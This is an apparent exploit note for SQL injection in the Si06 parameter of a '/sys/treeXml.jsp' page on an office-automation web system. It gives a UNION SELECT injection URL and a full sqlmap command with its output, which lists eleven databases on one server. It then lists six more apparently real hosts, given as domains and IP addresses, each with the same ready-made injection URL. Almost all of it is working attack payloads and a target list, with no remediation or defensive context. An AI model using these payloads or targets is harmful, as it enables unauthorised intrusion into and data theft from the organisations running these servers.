(1)http://oa.hzuf.com:9090
UNION注入:
http://oa.hzuf.com:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort
Sqlmap注入:
$ python sqlmap.py -u 'http://oa.hzuf.com:9090/sys/treeXml.jsp?Si06=1&type=sort' -p Si06 --dbms mssql --level 5 --risk 3 --technique=U --union-cols=14 --dbs --threads 10 --batch -v 1
---
Place: GET
Parameter: Si06
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns (custom)
Payload: Si06=1' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(103)+CHAR(106)+CHAR(97)+CHAR(113)+CHAR(98)+CHAR(89)+CHAR(114)+CHAR(104)+CHAR(111)+CHAR(110)+CHAR(87)+CHAR(103)+CHAR(73)+CHAR(122)+CHAR(113)+CHAR(102)+CHAR(111)+CHAR(117)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &type=sort
---
[00:46:07] [INFO] testing Microsoft SQL Server
[00:46:07] [INFO] confirming Microsoft SQL Server
[00:46:07] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: Servlet 2.4, Tomcat 4.0.4., JSP
back-end DBMS: Microsoft SQL Server 2005
[00:46:07] [INFO] fetching database names
available databases [11]:
[*] FE_APP5
[*] FE_BASE5
[*] FE_ERP
[*] master
[*] model
[*] msdb
[*] ncdb
[*] oa
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
(2)http://fsd2014.f3322.org:9090
http://fsd2014.f3322.org:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort
(3)http://119.145.194.122:9090
http://119.145.194.122:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort
(4)http://oa.chnjcdc.com:9090
http://oa.chnjcdc.com:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort
(5)http://183.129.249.246:9090
http://183.129.249.246:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort
(6)http://218.205.208.22:9090
http://218.205.208.22:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort
(7)http://120.196.116.3:7321
http://120.196.116.3:7321/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort